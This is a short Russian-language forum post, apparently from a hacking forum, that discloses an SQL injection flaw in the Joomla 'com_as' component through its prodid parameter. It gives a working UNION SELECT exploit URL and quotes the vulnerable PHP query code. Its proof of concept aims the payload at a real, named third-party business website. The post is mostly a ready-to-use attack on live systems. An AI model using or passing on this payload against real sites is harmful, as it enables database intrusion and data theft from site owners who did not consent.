14.01.2012, 15:22
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Joomla "com_as" component SQL Injection
Уязвим параметр prodid, что позволяет провести SQL-injection.
Эксплyатация:
Код:
http://site.ltd/index.php?option=com_as&as=200&page=1&prodid=-5+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19--+f
Код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$select[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"\n FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"\n WHERE id = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]prod_id[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
PoC:
Код:
http://www.hawa-verpackung.de/index.php?option=com_as&as=200&page=1&prodid=-5+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19--+f
© Ereee
|
|
|